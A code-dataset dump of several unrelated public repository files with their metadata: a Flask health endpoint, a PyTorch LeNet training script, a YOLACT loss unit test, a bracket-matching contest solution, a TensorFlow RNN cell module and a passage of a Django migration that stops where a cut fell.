b92dfdb9cf660d0d5f22957f0846b1b096c68a18 | e86f88bd05d2dfc3197191245a28734e0a94306c | /application/resources/app_health.py | 3ba4905a01498f419c9b5e1ea08834578798051b | [] | no_license | transreductionist/API-Project-1 | b83e008a8dcf19f690109d89b298111062f760c0 | d5ffcc5d276692d1578cea704125b1b3952beb1c | refs/heads/master | 2022-01-16T06:31:06.951095 | 2019-05-09T15:22:44 | 2019-05-09T15:22:44 | 185,820,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | """Resources entry point to test the health of the application."""
# pylint: disable=too-few-public-methods
# pylint: disable=no-self-use
from flask_api import status
from flask_restful import Resource
from application.controllers.app_health import heartbeat
class Heartbeat( Resource ):
"""Flask-RESTful resource endpoint to test the heartbeat of the application."""
def get( self ):
"""Endpoint to to see if the application is running."""
if heartbeat():
return None, status.HTTP_200_OK
return None, status.HTTP_500_INTERNAL_SERVER_ERROR
| [
"transreductionist@gmail.com"
] | transreductionist@gmail.com |
331490a12c2610a42bcb77211770ef9334ce64b5 | 3b79f312e4949e1b91725eb89d21bc2d6ceee660 | /chapter5/LeNet.py | 0fe85dfc91af2d05c408e7c44b3ef59b3296cf05 | [] | no_license | since2016/DL-pytorch | 634b129ad9f263422975d9b1028827ea091c44fb | af6c3950966e6f7a3983e253220a20c4b7fa3bde | refs/heads/master | 2020-12-28T13:36:35.450128 | 2020-02-06T02:29:23 | 2020-02-06T02:29:23 | 238,352,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,083 | py | import time
import torch as t
from torch import nn, optim
import sys
sys.path.append("..")
from d2lzh_pytorch import *
device = t.device('cuda' if t.cuda.is_available()
else 'cpu')
class LeNet(nn.Module):
def __init__(self):
super(LeNet, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(1, 6, 5, padding=2), # mnist 每张图片 28x28 ,所以四周有2位填充
nn.Sigmoid(),
nn.MaxPool2d(2, 2),
nn.Conv2d(6, 16, 5),
nn.Sigmoid(),
nn.MaxPool2d(2, 2),
# nn.Conv2d(16, 120, 5),
# nn.Sigmoid()
)
self.fc = nn.Sequential(
nn.Linear(400, 120),
nn.Sigmoid(),
nn.Linear(120, 84),
nn.Sigmoid(),
nn.Linear(84, 10),
nn.Sigmoid()
)
def forward(self, img):
feature = self.conv(img)
output = self.fc(feature.view(feature.size(0), -1))
return output
# net = LeNet()
# print(net)
batch_size = 256
train_iter, test_iter = load_data_fashion_mnist(batch_size=batch_size)
def evaluate_accuracy(data_iter, net, device=None):
if device is None and isinstance(net, torch.nn.Module):
device = list(net.parameters())[0].device
acc_sum, n = 0.0, 0
with torch.no_grad(): # 不去计算梯度
for X, y in data_iter:
if isinstance(net, t.nn.Module):
net.eval()
acc_sum += (net(X.to(device)).argmax(dim=1)==y.to(device)).float().sum().cpu().item()
net.train()
else:
if('is_training' in net.__code__.co_varnames):
acc_sum += (net(X, is_training=False).argmax(dim=1)==y).float().sum().item()
else:
acc_sum += (net(X).argmax(dim=1) ==y).float().sum().item()
n += y.shape[0]
return acc_sum/n
def train_ch5(net, train_iter, test_iter, batch_size, optimizer, device, num_epochs):
net = net.to(device)
print("trianing on", device)
loss = t.nn.CrossEntropyLoss()
for epoch in range(num_epochs):
train_l_sum, train_acc_sum, n, batch_count, start = 0.0, 0.0, 0, 0, time.time()
for X, y in train_iter:
X = X.to(device)
# print(X.shape)
y = y.to(device)
y_hat = net(X)
l = loss(y_hat, y)
optimizer.zero_grad()
l.backward()
optimizer.step()
train_l_sum += l.cpu().item()
train_acc_sum += (y_hat.argmax(dim=1) == y).sum().cpu().item()
n += y.shape[0]
batch_count += 1
test_acc = evaluate_accuracy(test_iter, net)
print("epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.1f sec" %(
epoch+1, train_l_sum/batch_count, train_acc_sum/n, test_acc, time.time() - start
))
net = LeNet()
lr, num_epochs = 0.001, 5
optimizer = t.optim.Adam(net.parameters(), lr =lr)
train_ch5(net, train_iter, test_iter, batch_size, optimizer, device, num_epochs)
| [
"815720921@qq.com"
] | 815720921@qq.com |
a161c21ea948b07a05375c924672731065a639c1 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/tests/test_models/test_dense_heads/test_yolact_head.py | 11b74a3b9a7c7d2bae8547cf62e2ad4fdb73cec3 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 5,894 | py |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Open-MMLab. All rights reserved.
# Copyright (c) OpenMMLab. All rights reserved.
import mmcv
import torch
from mmdet.models.dense_heads import YOLACTHead, YOLACTProtonet, YOLACTSegmHead
def test_yolact_head_loss():
"""Tests yolact head losses when truth is empty and non-empty."""
s = 550
img_metas = [{
'img_shape': (s, s, 3),
'scale_factor': 1,
'pad_shape': (s, s, 3)
}]
train_cfg = mmcv.Config(
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0.,
ignore_iof_thr=-1,
gt_max_assign_all=False),
smoothl1_beta=1.,
allowed_border=-1,
pos_weight=-1,
neg_pos_ratio=3,
debug=False,
min_gt_box_wh=[4.0, 4.0]))
bbox_head = YOLACTHead(
num_classes=80,
in_channels=256,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
octave_base_scale=3,
scales_per_octave=1,
base_sizes=[8, 16, 32, 64, 128],
ratios=[0.5, 1.0, 2.0],
strides=[550.0 / x for x in [69, 35, 18, 9, 5]],
centers=[(550 * 0.5 / x, 550 * 0.5 / x)
for x in [69, 35, 18, 9, 5]]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[0.1, 0.1, 0.2, 0.2]),
loss_cls=dict(
type='CrossEntropyLoss',
use_sigmoid=False,
reduction='none',
loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.5),
num_head_convs=1,
num_protos=32,
use_ohem=True,
train_cfg=train_cfg)
segm_head = YOLACTSegmHead(
in_channels=256,
num_classes=80,
loss_segm=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0))
mask_head = YOLACTProtonet(
num_classes=80,
in_channels=256,
num_protos=32,
max_masks_to_train=100,
loss_mask_weight=6.125)
feat = [
torch.rand(1, 256, feat_size, feat_size)
for feat_size in [69, 35, 18, 9, 5]
]
cls_score, bbox_pred, coeff_pred = bbox_head.forward(feat)
# Test that empty ground truth encourages the network to predict background
gt_bboxes = [torch.empty((0, 4))]
gt_labels = [torch.LongTensor([])]
gt_masks = [torch.empty((0, 550, 550))]
gt_bboxes_ignore = None
empty_gt_losses, sampling_results = bbox_head.loss(
cls_score,
bbox_pred,
gt_bboxes,
gt_labels,
img_metas,
gt_bboxes_ignore=gt_bboxes_ignore)
# When there is no truth, the cls loss should be nonzero but there should
# be no box loss.
empty_cls_loss = sum(empty_gt_losses['loss_cls'])
empty_box_loss = sum(empty_gt_losses['loss_bbox'])
assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
assert empty_box_loss.item() == 0, (
'there should be no box loss when there are no true boxes')
# Test segm head and mask head
segm_head_outs = segm_head(feat[0])
empty_segm_loss = segm_head.loss(segm_head_outs, gt_masks, gt_labels)
mask_pred = mask_head(feat[0], coeff_pred, gt_bboxes, img_metas,
sampling_results)
empty_mask_loss = mask_head.loss(mask_pred, gt_masks, gt_bboxes, img_metas,
sampling_results)
# When there is no truth, the segm and mask loss should be zero.
empty_segm_loss = sum(empty_segm_loss['loss_segm'])
empty_mask_loss = sum(empty_mask_loss['loss_mask'])
assert empty_segm_loss.item() == 0, (
'there should be no segm loss when there are no true boxes')
assert empty_mask_loss == 0, (
'there should be no mask loss when there are no true boxes')
# When truth is non-empty then cls, box, mask, segm loss should be
# nonzero for random inputs.
gt_bboxes = [
torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
]
gt_labels = [torch.LongTensor([2])]
gt_masks = [(torch.rand((1, 550, 550)) > 0.5).float()]
one_gt_losses, sampling_results = bbox_head.loss(
cls_score,
bbox_pred,
gt_bboxes,
gt_labels,
img_metas,
gt_bboxes_ignore=gt_bboxes_ignore)
one_gt_cls_loss = sum(one_gt_losses['loss_cls'])
one_gt_box_loss = sum(one_gt_losses['loss_bbox'])
assert one_gt_cls_loss.item() > 0, 'cls loss should be non-zero'
assert one_gt_box_loss.item() > 0, 'box loss should be non-zero'
one_gt_segm_loss = segm_head.loss(segm_head_outs, gt_masks, gt_labels)
mask_pred = mask_head(feat[0], coeff_pred, gt_bboxes, img_metas,
sampling_results)
one_gt_mask_loss = mask_head.loss(mask_pred, gt_masks, gt_bboxes,
img_metas, sampling_results)
one_gt_segm_loss = sum(one_gt_segm_loss['loss_segm'])
one_gt_mask_loss = sum(one_gt_mask_loss['loss_mask'])
assert one_gt_segm_loss.item() > 0, 'segm loss should be non-zero'
assert one_gt_mask_loss.item() > 0, 'mask loss should be non-zero'
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
bab16b9a5e848d7a157495bd6f15f1150128eba8 | 88ec9caf2c504f83bf192ca7fac6b712b6e1c2f7 | /Move_brackets.py | 880aee2b792d98e4c1b0403671ef963506c39c4a | [] | no_license | nitinverma99/Codeforces---1000 | 69ceb3fb0ee155e1e1574d884a49412bb0854d86 | f7f388cd2319e9425d63065717c0e612d46799dc | refs/heads/master | 2023-05-11T22:28:17.987429 | 2021-06-04T19:07:00 | 2021-06-04T19:07:00 | 373,936,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | t = int(input())
while t:
t-=1
a = int(input())
n = input()
ans = a//2
start = []
count = 0
for i in range(len(n)):
if n[i]=='(':
start.append(n[i])
elif start==[]:
count+=1
else:
start.pop(-1)
print(count) | [
"nitinv0504@gmail.com"
] | nitinv0504@gmail.com |
8efa8a16057685b548dcda3c1e635a18b1e035e3 | 7a6007df5481caa5a979cded53d3789869efe767 | /rnn_cell.py | e31c46261f82225e66665f3a1eaddea3ebebbfec | [] | no_license | zerkh/seq2seq_copy | 9db72e7024cfb86930119de29562203555114d9e | b914b5a203d6136befd989449ace5244daf64ba1 | refs/heads/master | 2022-11-30T19:02:57.707342 | 2016-04-13T12:37:45 | 2016-04-13T12:37:45 | 56,070,459 | 0 | 1 | null | 2022-11-29T00:41:32 | 2016-04-12T14:30:56 | Python | UTF-8 | Python | false | false | 23,206 | py | """Module for constructing RNN Cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import math
class RNNCell(object):
"""Abstract object representing an RNN cell.
An RNN cell, in the most abstract setting, is anything that has
a state -- a vector of floats of size self.state_size -- and performs some
operation that takes inputs of size self.input_size. This operation
results in an output of size self.output_size and a new state.
This module provides a number of basic commonly used RNN cells, such as
LSTM (Long Short Term Memory) or GRU (Gated Recurrent Unit), and a number
of operators that allow add dropouts, projections, or embeddings for inputs.
Constructing multi-layer cells is supported by a super-class, MultiRNNCell,
defined later. Every RNNCell must have the properties below and and
implement __call__ with the following signature.
"""
def __call__(self, inputs, state, scope=None):
"""Run this RNN cell on inputs, starting from the given state.
Args:
inputs: 2D Tensor with shape [batch_size x self.input_size].
state: 2D Tensor with shape [batch_size x self.state_size].
scope: VariableScope for the created subgraph; defaults to class name.
Returns:
A pair containing:
- Output: A 2D Tensor with shape [batch_size x self.output_size]
- New state: A 2D Tensor with shape [batch_size x self.state_size].
"""
raise NotImplementedError("Abstract method")
@property
def input_size(self):
"""Integer: size of inputs accepted by this cell."""
raise NotImplementedError("Abstract method")
@property
def output_size(self):
"""Integer: size of outputs produced by this cell."""
raise NotImplementedError("Abstract method")
@property
def state_size(self):
"""Integer: size of state used by this cell."""
raise NotImplementedError("Abstract method")
def zero_state(self, batch_size, dtype):
"""Return state tensor (shape [batch_size x state_size]) filled with 0.
Args:
batch_size: int, float, or unit Tensor representing the batch size.
dtype: the data type to use for the state.
Returns:
A 2D Tensor of shape [batch_size x state_size] filled with zeros.
"""
zeros = tf.zeros(
tf.pack([batch_size, self.state_size]), dtype=dtype)
zeros.set_shape([None, self.state_size])
return zeros
class BasicRNNCell(RNNCell):
"""The most basic RNN cell."""
def __init__(self, num_units):
self._num_units = num_units
@property
def input_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
@property
def state_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
"""Most basic RNN: output = new_state = tanh(W * input + U * state + B)."""
with tf.variable_scope(scope or type(self).__name__): # "BasicRNNCell"
output = tf.tanh(linear([inputs, state], self._num_units, True))
return output, output
class GRUCell(RNNCell):
"""Gated Recurrent Unit cell (cf. http://arxiv.org/abs/1406.1078)."""
def __init__(self, num_units):
self._num_units = num_units
@property
def input_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
@property
def state_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
"""Gated recurrent unit (GRU) with nunits cells."""
with tf.variable_scope(scope or type(self).__name__): # "GRUCell"
with tf.variable_scope("Gates"): # Reset gate and update gate.
# We start with bias of 1.0 to not reset and not update.
r, u = tf.split(1, 2, linear([inputs, state],
2 * self._num_units, True, 1.0))
r, u = tf.sigmoid(r), tf.sigmoid(u)
with tf.variable_scope("Candidate"):
c = tf.tanh(linear([inputs, r * state], self._num_units, True))
new_h = u * state + (1 - u) * c
return new_h, new_h
class BasicLSTMCell(RNNCell):
"""Basic LSTM recurrent network cell.
The implementation is based on: http://arxiv.org/pdf/1409.2329v5.pdf.
It does not allow cell clipping, a projection layer, and does not
use peep-hole connections: it is the basic baseline.
Biases of the forget gate are initialized by default to 1 in order to reduce
the scale of forgetting in the beginning of the training.
"""
def __init__(self, num_units, forget_bias=1.0):
self._num_units = num_units
self._forget_bias = forget_bias
@property
def input_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
@property
def state_size(self):
return 2 * self._num_units
def __call__(self, inputs, state, scope=None):
"""Long short-term memory cell (LSTM)."""
with tf.variable_scope(scope or type(self).__name__): # "BasicLSTMCell"
# Parameters of gates are concatenated into one multiply for efficiency.
c, h = tf.split(1, 2, state)
concat = linear([inputs, h], 4 * self._num_units, True)
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
i, j, f, o = tf.split(1, 4, concat)
new_c = c * tf.sigmoid(f + self._forget_bias) + tf.sigmoid(i) * tf.tanh(j)
new_h = tf.tanh(new_c) * sigmoid(o)
return new_h, tf.concat(1, [new_c, new_h])
def _get_sharded_variable(name, shape, initializer, dtype, num_shards):
"""Get a list of sharded variables with the given dtype and initializer."""
unit_shard_size = int(math.ceil(shape[1] / num_shards))
shards = []
for i in range(num_shards):
current_size = min(unit_shard_size, shape[1] - unit_shard_size * i)
shards.append(tf.get_variable(name + "_%d" % i, [shape[0], current_size],
initializer=initializer, dtype=dtype))
return shards
def _matmul_with_sharded_variable(tensor, sharded_tensor):
"""Multiply tensor with each tensor in sharded_tensor and column-concatenated"""
return tf.concat(1, [tf.matmul(tensor, shard)
for shard in sharded_tensor])
class LSTMCell(RNNCell):
"""Long short-term memory unit (LSTM) recurrent network cell.
This implementation is based on:
https://research.google.com/pubs/archive/43905.pdf
Hasim Sak, Andrew Senior, and Francoise Beaufays.
"Long short-term memory recurrent neural network architectures for
large scale acoustic modeling." INTERSPEECH, 2014.
It uses peep-hole connections, optional cell clipping, and an optional
projection layer.
"""
def __init__(self, num_units, input_size,
use_peepholes=False, cell_clip=None,
initializer=None, num_proj=None,
num_unit_shards=1, num_proj_shards=1):
"""Initialize the parameters for an LSTM cell.
Args:
num_units: int, The number of units in the LSTM cell
input_size: int, The dimensionality of the inputs into the LSTM cell
use_peepholes: bool, set True to enable diagonal/peephole connections.
cell_clip: (optional) A float value, if provided the cell state is clipped
by this value prior to the cell output activation.
initializer: (optional) The initializer to use for the weight and
projection matrices.
num_proj: (optional) int, The output dimensionality for the projection
matrices. If None, no projection is performed.
num_unit_shards: How to split the weight matrix. If >1, the weight
matrix is stored across num_unit_shards.
num_proj_shards: How to split the projection matrix. If >1, the
projection matrix is stored across num_proj_shards.
"""
self._num_units = num_units
self._input_size = input_size
self._use_peepholes = use_peepholes
self._cell_clip = cell_clip
self._initializer = initializer
self._num_proj = num_proj
self._num_unit_shards = num_unit_shards
self._num_proj_shards = num_proj_shards
if num_proj:
self._state_size = num_units + num_proj
self._output_size = num_proj
else:
self._state_size = 2 * num_units
self._output_size = num_units
@property
def input_size(self):
return self._input_size
@property
def output_size(self):
return self._output_size
@property
def state_size(self):
return self._state_size
def __call__(self, input_, state, scope=None):
"""Run one step of LSTM.
Args:
input_: input Tensor, 2D, batch x num_units.
state: state Tensor, 2D, batch x state_size.
scope: VariableScope for the created subgraph; defaults to "LSTMCell".
Returns:
A tuple containing:
- A 2D, batch x output_dim, Tensor representing the output of the LSTM
after reading "input_" when previous state was "state".
Here output_dim is:
num_proj if num_proj was set,
num_units otherwise.
- A 2D, batch x state_size, Tensor representing the new state of LSTM
after reading "input_" when previous state was "state".
"""
num_proj = self._num_units if self._num_proj is None else self._num_proj
c_prev = tf.slice(state, [0, 0], [-1, self._num_units])
m_prev = tf.slice(state, [0, self._num_units], [-1, num_proj])
dtype = input_.dtype
with tf.variable_scope(scope or type(self).__name__): # "LSTMCell"
sharded_w = _get_sharded_variable(
"W", [self.input_size + num_proj, 4 * self._num_units],
self._initializer, dtype, self._num_unit_shards)
b = tf.get_variable(
"B", shape=[4 * self._num_units],
initializer=tf.zeros_initializer, dtype=dtype)
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
cell_inputs = tf.concat(1, [input_, m_prev])
lstm_matrix = tf.nn.bias_add(
_matmul_with_sharded_variable(cell_inputs, sharded_w), b)
i, j, f, o = tf.split(1, 4, lstm_matrix)
# Diagonal connections
if self._use_peepholes:
w_f_diag = tf.get_variable(
"W_F_diag", shape=[self._num_units],
initializer=self._initializer,
dtype=dtype)
w_i_diag = tf.get_variable(
"W_I_diag", shape=[self._num_units],
initializer=self._initializer,
dtype=dtype)
w_o_diag = tf.get_variable(
"W_O_diag", shape=[self._num_units],
initializer=self._initializer,
dtype=dtype)
if self._use_peepholes:
c = (tf.sigmoid(f + 1 + w_f_diag * c_prev) * c_prev +
tf.sigmoid(i + w_i_diag * c_prev) * tf.tanh(j))
else:
c = (tf.sigmoid(f + 1) * c_prev + tf.sigmoid(i) * tf.tanh(j))
if self._cell_clip is not None:
c = tf.clip_by_value(c, -self._cell_clip, self._cell_clip)
if self._use_peepholes:
m = tf.sigmoid(o + w_o_diag * c) * tanh(c)
else:
m = tf.sigmoid(o) * tf.tanh(c)
if self._num_proj is not None:
sharded_w_proj = _get_sharded_variable(
"W_P", [self._num_units, self._num_proj], self._initializer,
dtype, self._num_proj_shards)
m = _matmul_with_sharded_variable(m, sharded_w_proj)
return m, tf.concat(1, [c, m])
class OutputProjectionWrapper(RNNCell):
"""Operator adding an output projection to the given cell.
Note: in many cases it may be more efficient to not use this wrapper,
but instead concatenate the whole sequence of your outputs in time,
do the projection on this batch-concatenated sequence, then split it
if needed or directly feed into a softmax.
"""
def __init__(self, cell, output_size):
"""Create a cell with output projection.
Args:
cell: an RNNCell, a projection to output_size is added to it.
output_size: integer, the size of the output after projection.
Raises:
TypeError: if cell is not an RNNCell.
ValueError: if output_size is not positive.
"""
if not isinstance(cell, RNNCell):
raise TypeError("The parameter cell is not RNNCell.")
if output_size < 1:
raise ValueError("Parameter output_size must be > 0: %d." % output_size)
self._cell = cell
self._output_size = output_size
@property
def input_size(self):
return self._cell.input_size
@property
def output_size(self):
return self._output_size
@property
def state_size(self):
return self._cell.state_size
def __call__(self, inputs, state, scope=None):
"""Run the cell and output projection on inputs, starting from state."""
output, res_state = self._cell(inputs, state)
# Default scope: "OutputProjectionWrapper"
with tf.variable_scope(scope or type(self).__name__):
projected = linear(output, self._output_size, True)
return projected, res_state
class InputProjectionWrapper(RNNCell):
"""Operator adding an input projection to the given cell.
Note: in many cases it may be more efficient to not use this wrapper,
but instead concatenate the whole sequence of your inputs in time,
do the projection on this batch-concatenated sequence, then split it.
"""
def __init__(self, cell, input_size):
"""Create a cell with input projection.
Args:
cell: an RNNCell, a projection of inputs is added before it.
input_size: integer, the size of the inputs before projection.
Raises:
TypeError: if cell is not an RNNCell.
ValueError: if input_size is not positive.
"""
if not isinstance(cell, RNNCell):
raise TypeError("The parameter cell is not RNNCell.")
if input_size < 1:
raise ValueError("Parameter input_size must be > 0: %d." % input_size)
self._cell = cell
self._input_size = input_size
@property
def input_size(self):
return self._input_size
@property
def output_size(self):
return self._cell.output_size
@property
def state_size(self):
return self._cell.state_size
def __call__(self, inputs, state, scope=None):
"""Run the input projection and then the cell."""
# Default scope: "InputProjectionWrapper"
with tf.variable_scope(scope or type(self).__name__):
projected = linear(inputs, self._cell.input_size, True)
return self._cell(projected, state)
class DropoutWrapper(RNNCell):
"""Operator adding dropout to inputs and outputs of the given cell."""
def __init__(self, cell, input_keep_prob=1.0, output_keep_prob=1.0,
seed=None):
"""Create a cell with added input and/or output dropout.
Dropout is never used on the state.
Args:
cell: an RNNCell, a projection to output_size is added to it.
input_keep_prob: unit Tensor or float between 0 and 1, input keep
probability; if it is float and 1, no input dropout will be added.
output_keep_prob: unit Tensor or float between 0 and 1, output keep
probability; if it is float and 1, no output dropout will be added.
seed: (optional) integer, the randomness seed.
Raises:
TypeError: if cell is not an RNNCell.
ValueError: if keep_prob is not between 0 and 1.
"""
if not isinstance(cell, RNNCell):
raise TypeError("The parameter cell is not a RNNCell.")
if (isinstance(input_keep_prob, float) and
not (input_keep_prob >= 0.0 and input_keep_prob <= 1.0)):
raise ValueError("Parameter input_keep_prob must be between 0 and 1: %d"
% input_keep_prob)
if (isinstance(output_keep_prob, float) and
not (output_keep_prob >= 0.0 and output_keep_prob <= 1.0)):
raise ValueError("Parameter input_keep_prob must be between 0 and 1: %d"
% output_keep_prob)
self._cell = cell
self._input_keep_prob = input_keep_prob
self._output_keep_prob = output_keep_prob
self._seed = seed
@property
def input_size(self):
return self._cell.input_size
@property
def output_size(self):
return self._cell.output_size
@property
def state_size(self):
return self._cell.state_size
def __call__(self, inputs, state):
"""Run the cell with the declared dropouts."""
if (not isinstance(self._input_keep_prob, float) or
self._input_keep_prob < 1):
inputs = tf.nn.dropout(inputs, self._input_keep_prob, seed=self._seed)
output, new_state = self._cell(inputs, state)
if (not isinstance(self._output_keep_prob, float) or
self._output_keep_prob < 1):
output = tf.nn.dropout(output, self._output_keep_prob, seed=self._seed)
return output, new_state
class EmbeddingWrapper(RNNCell):
"""Operator adding input embedding to the given cell.
Note: in many cases it may be more efficient to not use this wrapper,
but instead concatenate the whole sequence of your inputs in time,
do the embedding on this batch-concatenated sequence, then split it and
feed into your RNN.
"""
def __init__(self, cell, embedding_classes=0, embedding=None,
initializer=None):
"""Create a cell with an added input embedding.
Args:
cell: an RNNCell, an embedding will be put before its inputs.
embedding_classes: integer, how many symbols will be embedded.
embedding: Variable, the embedding to use; if None, a new embedding
will be created; if set, then embedding_classes is not required.
initializer: an initializer to use when creating the embedding;
if None, the initializer from variable scope or a default one is used.
Raises:
TypeError: if cell is not an RNNCell.
ValueError: if embedding_classes is not positive.
"""
if not isinstance(cell, RNNCell):
raise TypeError("The parameter cell is not RNNCell.")
if embedding_classes < 1 and embedding is None:
raise ValueError("Pass embedding or embedding_classes must be > 0: %d."
% embedding_classes)
if embedding_classes > 0 and embedding is not None:
if embedding.size[0] != embedding_classes:
raise ValueError("You declared embedding_classes=%d but passed an "
"embedding for %d classes." % (embedding.size[0],
embedding_classes))
if embedding.size[1] != cell.input_size:
raise ValueError("You passed embedding with output size %d and a cell"
" that accepts size %d." % (embedding.size[1],
cell.input_size))
self._cell = cell
self._embedding_classes = embedding_classes
self._embedding = embedding
self._initializer = initializer
@property
def input_size(self):
return 1
@property
def output_size(self):
return self._cell.output_size
@property
def state_size(self):
return self._cell.state_size
def __call__(self, inputs, state, scope=None):
"""Run the cell on embedded inputs."""
with tf.variable_scope(scope or type(self).__name__): # "EmbeddingWrapper"
with tf.device("/cpu:0"):
if self._embedding:
embedding = self._embedding
else:
if self._initializer:
initializer = self._initializer
elif tf.get_variable_scope().initializer:
initializer = tf.get_variable_scope().initializer
else:
# Default initializer for embeddings should have variance=1.
sqrt3 = math.sqrt(3) # Uniform(-sqrt(3), sqrt(3)) has variance=1.
initializer = tf.random_uniform_initializer(-sqrt3, sqrt3)
embedding = tf.get_variable("embedding", [self._embedding_classes,
self._cell.input_size],
initializer=initializer)
embedded = tf.nn.embedding_lookup(
embedding, tf.reshape(inputs, [-1]))
return self._cell(embedded, state)
class MultiRNNCell(RNNCell):
"""RNN cell composed sequentially of multiple simple cells."""
def __init__(self, cells):
"""Create a RNN cell composed sequentially of a number of RNNCells.
Args:
cells: list of RNNCells that will be composed in this order.
Raises:
ValueError: if cells is empty (not allowed) or if their sizes don't match.
"""
if not cells:
raise ValueError("Must specify at least one cell for MultiRNNCell.")
for i in xrange(len(cells) - 1):
if cells[i + 1].input_size != cells[i].output_size:
raise ValueError("In MultiRNNCell, the input size of each next"
" cell must match the output size of the previous one."
" Mismatched output size in cell %d." % i)
self._cells = cells
@property
def input_size(self):
return self._cells[0].input_size
@property
def output_size(self):
return self._cells[-1].output_size
@property
def state_size(self):
return sum([cell.state_size for cell in self._cells])
def __call__(self, inputs, state, scope=None):
"""Run this multi-layer cell on inputs, starting from state."""
with tf.variable_scope(scope or type(self).__name__): # "MultiRNNCell"
cur_state_pos = 0
cur_inp = inputs
new_states = []
for i, cell in enumerate(self._cells):
with tf.variable_scope("Cell%d" % i):
cur_state = tf.slice(
state, [0, cur_state_pos], [-1, cell.state_size])
cur_state_pos += cell.state_size
cur_inp, new_state = cell(cur_inp, cur_state)
new_states.append(new_state)
return cur_inp, tf.concat(1, new_states)
def linear(args, output_size, bias, bias_start=0.0, scope=None):
"""Linear map: sum_i(args[i] * W[i]), where W[i] is a variable.
Args:
args: a 2D Tensor or a list of 2D, batch x n, Tensors.
output_size: int, second dimension of W[i].
bias: boolean, whether to add a bias term or not.
bias_start: starting value to initialize the bias; 0 by default.
scope: VariableScope for the created subgraph; defaults to "Linear".
Returns:
A 2D Tensor with shape [batch x output_size] equal to
sum_i(args[i] * W[i]), where W[i]s are newly created matrices.
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
assert args
if not isinstance(args, (list, tuple)):
args = [args]
# Calculate the total size of arguments on dimension 1.
total_arg_size = 0
shapes = [a.get_shape().as_list() for a in args]
for shape in shapes:
if len(shape) != 2:
raise ValueError("Linear is expecting 2D arguments: %s" % str(shapes))
if not shape[1]:
raise ValueError("Linear expects shape[1] of arguments: %s" % str(shapes))
else:
total_arg_size += shape[1]
# Now the computation.
with tf.variable_scope(scope or "Linear"):
matrix = tf.get_variable("Matrix", [total_arg_size, output_size])
if len(args) == 1:
res = tf.matmul(args[0], matrix)
else:
res = tf.matmul(tf.concat(1, args), matrix)
if not bias:
return res
bias_term = tf.get_variable(
"Bias", [output_size],
initializer=tf.constant_initializer(bias_start))
return res + bias_term
| [
"mhzx20@163.com"
] | mhzx20@163.com |
7f7cdc92c7f32efe6d16d4b8c49496d69f5ae071 | 0cf8b481274d13ed6e6f3f5ab9ee2b14f78129a4 | /backend/src/articles/migrations/0001_initial.py | a1356cbeeec3c26113b3ab6b8d4aa59db97946e2 | [] | no_license | TrellixVulnTeam/Dbms_MBGW | 25a53b37d2c0394be599daa9ef1891fabfe4908b | 8920d2b005671e55efbf52ff0d03b573aa8bc8f2 | refs/heads/master | 2023-03-15T15:00:00.305864 | 2019-05-05T19:45:13 | 2019-05-05T19:45:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,456 | py | # Generated by Django 2.1.5 on 2019-05-05 16:55
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Events',
fields=[
('event_date', models.DateField()),
('event_type', models.CharField(choices=[('s', 'Sports'), ('t', 'Technical'), ('c', 'Cultural')], max_length=20)),
('event_div', models.CharField(choices=[('w', 'workshop'), ('comp', 'competition'), ('conf', 'conference')], max_length=20)),
('event_id', models.CharField(max_length=120, primary_key=True, serialize=False)),
('event_name', models.CharField(max_length=30)),
('poster_img', models.CharField(max_length=500)),
('reg_fee', models.IntegerField(default=0)),
('event_desc', models.CharField(max_length=20000)),
],
),
migrations.CreateModel(
name='Organizer',
fields=[
('name', models.CharField(max_length=120)),
('email_id', models.EmailField(max_length=254)),
('phone_no', models.IntegerField()),
('userType', models.CharField(default='x', max_length=1)),
